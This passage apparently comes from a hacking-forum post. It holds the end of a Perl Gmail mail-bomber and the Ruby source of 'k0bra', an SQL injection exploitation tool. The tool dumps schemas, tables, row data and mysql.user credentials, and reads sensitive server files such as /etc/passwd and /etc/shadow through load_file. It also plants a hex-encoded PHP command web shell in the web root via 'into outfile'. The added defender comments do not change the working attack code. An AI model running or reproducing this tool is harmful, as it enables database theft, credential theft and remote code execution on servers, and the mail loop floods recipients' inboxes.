  # provider's per-account sending limits and abuse handling, plus
  # recipient-side rate limiting and filtering on sender/subject/body
  # (all three are constant across the burst).
  sub start {

     # NOTE(review): $text is assigned without `my`, i.e. as a package variable.
     $text = $body->get( "1.0", "end" );
     chomp $text;

     # The constructor's return value is used as the login success test;
     # presumably it is false when authentication fails -- confirm against
     # the module's documentation.
     if (
         my $mail = Email::Send::SMTP::Gmail->new(
             -smtp  => "gmail.com",
             -login => $user->get,
             -pass  => $pass->get
         )
       )
     {

         # The loop variable shares its name with the $number Entry widget
         # whose value supplies the upper bound of the range.
         for my $number ( 1 .. $number->get ) {
             # Let Tk process pending events between sends.
             $ve->update;
             $mail->send(
                 -to      => $to->get,
                 -subject => $tema->get,
                 -body    => $text
             );
         }

         Win32::MsgBox( "Send", 0, "Mails Send" );

         $mail->bye;

     }
     else {
         Win32::MsgBox( "Error in the login", 0, "Error" );
     }
  }
  176.  
  # Callback for the "About" button: shows the author credits in a
  # Win32 message box titled "About".
  sub about {

      # The line break between the two parts is part of the displayed text.
      my $credits = join "\n",
        "This program was written by Doddy H for the Tournament of Programming Perl",
        "to forum HackxCrack";

      return Win32::MsgBox( $credits, 0, "About" );
  }
  186.  
  187. #The End ?
  188.  
380  Programación / Scripting / [Ruby] k0bra 0.3 en: 16 Febrero 2012, 18:16 pm
Un simple escáner de SQLi con las siguientes funciones:


  • Comprobar vulnerabilidad
  • Buscar número de columnas
  • Buscar automáticamente el número para mostrar datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar información sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
Código
  1. #!usr/bin/ruby
  2. #K0bra 0.3
  3. #Coded By Doddy H
  4.  
  5. require "net/http"
  6.  
  7. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log
','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','
/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my
.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  8.  
  # Issue a plain HTTP GET for +web+ and return the response body as a string.
  # Every request the script makes goes through this helper; no headers,
  # cookies or timeouts are set here.
  def toma(web)
    target = URI.parse(web)
    reply = Net::HTTP.get_response(target)
    return reply.body
  end
  12.  
  # Print the author notice and wait for one line of input before returning
  # (used as the "Exit" action of the menu).
  def copyright()
    $stdout.print "\n\n(C) Doddy Hackman 2012\n\n"
    gets.chomp
  end
  17.  
  # Make sure a "logs_webs" directory exists under the current working
  # directory; savefile() writes its per-host log files there.
  def installer()
    log_dir = "#{Dir::pwd}/logs_webs"
    Dir::mkdir(log_dir) unless FileTest::directory?(log_dir)
  end
  24.  
  # Return +texto+ as a hexadecimal literal: "0x" followed by the lowercase
  # hex digits of its bytes. The script uses this form so that names can be
  # placed in a query without quote characters.
  def encodehex(texto)
    hex_digits = texto.unpack('H*').first
    "0x" + hex_digits
  end
  28.  
  # Append +text+ plus a newline to logs_webs/<host>.txt, where <host> is the
  # host part of the URL passed in +file+.
  #
  # Forensics note: these per-host files collect everything the script
  # prints, stored in clear text, which makes them the artefact to look for
  # on a machine that ran the tool.
  def savefile(file,text)
    host = URI.parse(file).host
    log = File.open("logs_webs/"+host+".txt","a")
    log.puts text+"\n"
    log.close
  end
  35.  
  # Map the operator-selected "bypass" mode to a pair of strings:
  # the token the script puts where a space would go, and the token it
  # appends at the end of the request.
  #
  # Defender's view: the three pairs differ only in how whitespace and the
  # trailing comment are spelled, which is why input filters that match on
  # literal spaces are not a fix; decode and normalise before matching, and
  # treat parameterised queries as the actual remedy.
  def bypass(op)
    case op
    when "/*"
      return "/**/","/**/"
    when "%20"
      return "%20","%00"
    else
      # "--" and every unrecognised mode share the same pair.
      return "+","--"
    end
  end
  47.  
  48. def head()
  49.  
  50.  print "
  51.  
  52. @      @@   @            
  53. @@     @  @ @@            
  54. @ @@  @  @  @ @   @ @ @@@
  55. @ @   @  @  @@ @ @@@ @  @
  56. @@    @  @  @  @  @   @@@
  57. @ @   @  @  @  @  @  @  @
  58. @@@ @   @@   @@@  @@@ @@@@@
  59.  
  60. "
  61. end
  62.  
  # Pause until the operator presses Enter, then go back to the first
  # prompt (inicio).
  def volverinicio()
    $stdout.print "\n\n[+] Press any key to continue\n\n"
    gets.chomp
    inicio()
  end
  68.  
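  # Clear the terminal with the platform's own command and return the result
  # of the system() call.
  def clean()
    # Native Windows builds report "mswin" or "mingw" in RUBY_PLATFORM.
    # A bare /win/ test is wrong in both directions: it matches "darwin"
    # (macOS) and does not match "mingw".
    if RUBY_PLATFORM =~ /mswin|mingw/
      system("cls")
    else
      system("clear")
    end
  end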
  76.  
  # Pause until the operator presses Enter, then redraw the main menu for
  # the same URL and bypass mode.
  def retorno(url,by)
    $stdout.print "\n\n[+] Press any key to continue\n\n"
    gets.chomp
    central(url,by)
  end
  82.  
  # List table names through a URL that already contains the "hackman"
  # placeholder.
  #
  # The placeholder is replaced first by a count expression and then by a
  # per-row name expression, each wrapped in the marker 0x4b30425241
  # ("K0BRA"), with "from information_schema.tables" appended. Whatever the
  # response shows between two markers is printed and logged via savefile.
  #
  # Defender's view: in access logs this appears as a run of near-identical
  # requests whose query string contains "information_schema.tables", the
  # hex marker, and a changing "limit N,1" offset. The root fix is
  # parameterised queries in the application.
  def gettables(url,by)
   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
   print "\n\n[+] Getting tables ...\n\n"
   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     print "[+] Tables Found : ",total,"\n\n"
     savefile(url,"\n[+] Tables Found : #{total}\n")
     # One request per row offset.
     for num in ("17"..total)
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*?)K0BRA/
         table = $1
         print "[+] Table Found : "+table+"\n"
         savefile(url,"[+] Table Found : #{table}")
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  105.  
  # List the column names of table +tablex+ through a URL containing the
  # "hackman" placeholder.
  #
  # The table name is hex-encoded with encodehex so it can be compared in
  # the WHERE clause without quotes. A count request is sent first, then one
  # request per row offset against information_schema.columns; values found
  # between K0BRA markers are printed and logged.
  #
  # Defender's view: look for "information_schema.columns" together with
  # "table_name=0x..." in request parameters. Parameterised queries remove
  # the injection point these requests depend on.
  def getcolumns(url,by,tablex)
   tablexa = encodehex(tablex)
   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
   print "\n\n[+] Getting columns ...\n\n"
   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     print "[+] Columns Found : ",total,"\n\n"
     savefile(url,"\n[+] Table : #{tablex}")
     savefile(url,"[+] Columns Found : #{total}\n")
     for num in ("0"..total)
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*?)K0BRA/
         table = $1
         print "[+] Column Found : "+table+"\n"
         savefile(url,"[+] Column Found : #{table}")
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  130.  
  # List database (schema) names through a URL containing the "hackman"
  # placeholder, reading them from information_schema.schemata: one count
  # request, then one request per row offset. Matches between K0BRA markers
  # are printed and logged.
  #
  # Defender's view: which schemas come back depends on what the
  # application's database account is allowed to see, so a least-privilege
  # account limits the result even when an injection exists.
  def getdbs(url,by)
   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
   print "\n\n[+] Getting DBS ...\n\n"
   code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     print "[+] DBS Found : ",total,"\n\n"
     savefile(url,"\n[+] DBS Found : #{total}\n")
     for num in ("0"..total)
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*?)K0BRA/
         table = $1
         print "[+] DB Found : "+table+"\n"
         savefile(url,"[+] DB Found : #{table}")
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  153.  
  # List the tables of database +dbx+ through a URL containing the "hackman"
  # placeholder. Same request pattern as the other listing helpers, with a
  # "table_schema=<hex of dbx>" condition on information_schema.tables.
  #
  # Defender's view: cross-schema listing only returns rows for schemas the
  # application account holds privileges on; one database account per
  # application keeps an injection in one site from describing the others.
  def gettablesbydb(url,by,dbx)
   data  = encodehex(dbx)
   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
   print "\n\n[+] Getting tables ...\n\n"
   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     print "[+] Tables Found : ",total,"\n\n"
     savefile(url,"\n[+] DBS : #{dbx}")
     savefile(url,"[+] Tables Found : #{total}\n")
     for num in ("0"..total)
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*?)K0BRA/
         table = $1
         print "[+] Table Found : "+table+"\n"
         savefile(url,"[+] Table Found : #{table}")
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  178.  
  # List the columns of table +tab+ in database +db+ through a URL
  # containing the "hackman" placeholder. Both names are hex-encoded and
  # used as "table_name=... and table_schema=..." conditions on
  # information_schema.columns; results between K0BRA markers are printed
  # and logged.
  #
  # Defender's view: same log signature as the other listing helpers
  # (information_schema.columns, hex literals, changing "limit N,1").
  def getcolumnsbydb(url,by,db,tab)
   data = encodehex(db)
   tabx = encodehex(tab)

   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
   print "\n\n[+] Getting columns ...\n\n"
   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     print "[+] Columns Found : ",total,"\n\n"
     savefile(url,"\n[+] DB : #{db}")
     savefile(url,"[+] Table : #{tab}")
     savefile(url,"[+] Columns Found : #{total}\n")
     for num in ("0"..total)
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*?)K0BRA/
         table = $1
         print "[+] Column Found : "+table+"\n"
         savefile(url,"[+] Column Found : #{table}")
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  206.  
  # Read Host, User and Password from mysql.user through a URL containing
  # the "hackman" placeholder. The three fields are separated by distinct
  # markers (K0BRA, K0BRA1, K0BRA2) so the regex below can split them; each
  # row is printed and logged in clear text.
  #
  # Defender's view: this only works when the web application's database
  # account can SELECT from the mysql system schema. An application account
  # should have privileges on its own schema only, which makes this request
  # fail even if the injection exists.
  def mysqluser(url,by)
   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
    print "\n\n[+] Searching mysql.user\n\n"
   code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     print "[+] Users Mysql Found : ",total,"\n\n"
     savefile(url,"[+] Users Mysql Found : "+total+"\n")
     for num in ("0"..total)
       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
         host,user,passw = $1,$2,$3
         print "[Host] : "+host
         print " [User] : "+user
         print " [Pass] : "+passw+"\n"  
         savefile(url,"[Host] : "+host)
         savefile(url,"[User] : "+user)
         savefile(url,"[Pass] : "+passw+"\n")
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  233.  
  # Collect basic facts about the database behind a URL containing the
  # "hackman" placeholder and log them:
  #   - user(), database() and version(), separated by K0BRA markers;
  #   - whether a select of the bare marker from mysql.user succeeds;
  #   - whether the same select from information_schema.tables succeeds;
  #   - whether load_file() of the path in hextest returns without breaking
  #     the page (checked via the "ERTOR854" marker built with char(...)).
  #
  # Defender's view: the three ON/OFF results correspond to three hardening
  # items -- no access to the mysql schema for application accounts, a
  # least-privilege account, and no FILE privilege (together with a
  # restrictive secure_file_priv setting on the server).
  def details(url,by)
   pass1,pass2 = bypass(by)
   hextest = "0x2f6574632f706173737764" #/etc/passwd
   hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
   web1 = url.sub(/hackman/,"0x4b30425241")
   web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
   web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
    print "\n\n[+] Extrating information of the DB\n\n"
   code1 = toma(web2)
   if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
     user,data,ver = $1,$2,$3
     print "\n[+] Username : "+user
     print "\n[+] Database : "+data
     print "\n[+] Version : "+ver+"\n\n"
     savefile(url,"\n[+] Username : "+user)
     savefile(url,"[+] Database : "+data)
     savefile(url,"[+] Version : "+ver+"\n")
   else
     print "[-] Not Found\n"
   end
    # Three independent capability probes; each only checks for its marker.
    code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    code4 = toma(web3)
    if code2=~/K0BRA/
      print "[+] Mysqluser : ON\n"
      savefile(url,"[+] Mysqluser : ON")
    end
    if code3=~/K0BRA/
      print "[+] information_schema : ON\n"
      savefile(url,"[+] information_schema : ON")
    end
    if code4=~/ERTOR854/
      print "[+] load_file : ON\n"
      savefile(url,"[+] load_file : ON")
    end  
    savefile(url,"") # blank line in the log
  end
  271.  
  # Read two columns (+col1+, +col2+) of every row of +table+ through a URL
  # containing the "hackman" placeholder. The table and column names are
  # taken from operator input and concatenated into the request as-is. A
  # count request is sent first, then one request per row offset; each pair
  # of values is printed and appended to the log.
  #
  # Defender's view: this is the step where application data leaves the
  # database, one row per HTTP request. Request-rate alerting on a single
  # parameterised endpoint and parameterised queries in the application are
  # the relevant controls; stored credentials should be salted hashes so
  # that a dump does not yield usable passwords.
  def dumper(url,by,table,col1,col2)
   pass1,pass2 = bypass(by)
   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
   print "\n\n[+] Getting Values ...\n\n"
   code1 = toma(web1+pass1+"from"+pass1+table+pass2)
   if code1=~/K0BRA(.*?)K0BRA/
     total = $1
     savefile(url,"\n[+] Table : "+table)
     savefile(url,"[+] Column 1 : "+col1)
     savefile(url,"[+] Column 2 : "+col2)
     print "[+] Values Found : ",total,"\n\n"
     savefile(url,"\n[+] Values Found : #{total}\n")
     for num in ("0"..total)
       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
       if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
         uno,dos = $1,$2
         print "\n[+] "+col1+" : "+uno+"\n"
         print "[+] "+col2+" : "+dos+"\n"
         savefile(url,"\n[+] "+col1+" : "+uno)
         savefile(url,"[+] "+col2+" : "+dos)
       end
     end
   else
     print "[-] Not Found\n"
   end
  end
  299.  
  # For every path in the global $files list, request load_file(<hex path>)
  # through a URL containing the "hackman" placeholder, with the result
  # wrapped in the "ERTOR854" marker. When the response contains content
  # between two markers, the path and the content are printed and logged.
  #
  # Defender's view: load_file() needs the FILE privilege and is further
  # restricted by the server's secure_file_priv setting and by what the
  # mysqld OS user can read. An application account without FILE makes every
  # request here come back empty. In access logs the pattern is a burst of
  # requests containing "load_file(0x".
  def fuzzfile(url,by)
   pass1,pass2 = bypass(by)
   print "\n\n[+] Fuzzing Files with load_file ....\n"
   $files.each do |file|
     # Keep the readable path for output; the request uses the hex form.
     res = file
     file = file.chomp
     file = encodehex(file)
     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
     code = toma(web1)
     if code=~/ERTOR854(.*?)ERTOR854/m
       print "\n\n[File Found] : ",res
       print "\n\n[Source Start]\n"
       print $1
       print "\n[Source End]"
       savefile(url,"\n[File Found] : "+res)
       savefile(url,"\n[Source Start]\n")
       savefile(url,$1)
       savefile(url,"\n[Source End]")
     end    
   end
  end
  321.  
  # Request a single operator-supplied path with load_file() through a URL
  # containing the "hackman" placeholder; on a marker match the content is
  # printed and logged, otherwise an error line is printed.
  #
  # Defender's view: same preconditions as any load_file() read -- FILE
  # privilege on the application's database account, a permissive
  # secure_file_priv, and OS-level read access for the mysqld user.
  # Removing the first is sufficient.
  def abrirfile(url,by,file)
   pass1,pass2 = bypass(by)
   print "\n\n[+] Opening file ....\n"
   # Keep the readable path for output; the request uses the hex form.
   res = file
   file = encodehex(file)
     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
     code = toma(web1)
     if code=~/ERTOR854(.*?)ERTOR854/m
       print "\n\n[File Found] : ",res
       print "\n\n[Source Start]\n"
       print $1
       print "\n[Source End]"
       savefile(url,"\n[File Found] : "+res)
       savefile(url,"\n[Source Start]\n")
       savefile(url,$1)
       savefile(url,"\n[Source End]")
     else
       print "\n\n[-] Error\n\n"
     end    
  end
  342.  
  # Try to write a file named cmd.php under the server path +full+ using
  # "into outfile", then fetch http://<host><dir>/cmd.php and report success
  # when the response contains "Mini Shell By Doddy". +linea+ is the
  # hex-encoded content that replaces the "hackman" placeholder.
  #
  # Defender's view: this step turns a database flaw into code on the web
  # server and depends on all of the following, each of which is a control:
  #   - the application's database account holds the FILE privilege;
  #   - secure_file_priv does not confine file output to a safe directory;
  #   - the mysqld OS user can write inside the web root;
  #   - the web server executes .php files from that directory.
  # File-integrity monitoring on the web root (new cmd.php, files owned by
  # the database user) and "into outfile" in request logs are the
  # detection points.
  def into(url,by,full,dir)
   pass1,pass2 = bypass(by)
   linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
   lugar = full+"/cmd.php"
   lugardos = dir+"/cmd.php"
   h = URI.parse(url)
   webtest = "http://"+h.host+lugardos
   web1 = url.sub(/hackman/,linea)
   formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
   toma(formandoweb)
   code = toma(webtest)
   if code=~/Mini Shell By Doddy/
     print "\n\n[shell up] : "+webtest+"\n"
     savefile(url,"\n[shell up] : "+webtest+"\n")
   else
     print "\n\n[-] Error\n"
   end
  end
  361.  
  # Main menu. Redraws the screen, shows the current URL and bypass mode,
  # reads one option from standard input and runs the matching action.
  # Options 1-12 come back to this menu through retorno; 13 restarts at the
  # first prompt and 14 prints the author notice. Any other input redraws
  # the menu.
  def central(url,by)
    clean()
    head()
    print "\n\n[+] Page : #{url}\n",
          "[+] ByPass : #{by}\n\n\n"

    print "\n[information_schema]\n\n",
          "1 - Show tables\n",
          "2 - Show columns of the a table\n",
          "3 - Show databases\n",
          "4 - Show tables from the a DB\n",
          "5 - Show columns from the a table of the DB\n",
          "\n[mysql.user]\n\n",
          "6 - Show users\n",
          "\n[Others]\n\n",
          "7 - Show details\n",
          "8 - Dump data\n",
          "9 - Fuzz Files with load_file\n",
          "10 - Load files with load_file\n",
          "11 - Create Shell\n",
          "12 - Show log\n",
          "13 - Change target\n",
          "14 - Exit\n\n"

    print "[+] Option : "
    choice = gets.chomp

    case choice
    when "1"
      gettables(url,by)
      retorno(url,by)
    when "2"
      print "\n\n[+] Table : "
      table = gets.chomp
      getcolumns(url,by,table)
      retorno(url,by)
    when "3"
      getdbs(url,by)
      retorno(url,by)
    when "4"
      print "\n\n[+] DB : "
      db = gets.chomp
      gettablesbydb(url,by,db)
      retorno(url,by)
    when "5"
      print "\n\n[+] DB : "
      db = gets.chomp
      print "\n\n[+] Table : "
      tab = gets.chomp
      getcolumnsbydb(url,by,db,tab)
      retorno(url,by)
    when "6"
      mysqluser(url,by)
      retorno(url,by)
    when "7"
      details(url,by)
      retorno(url,by)
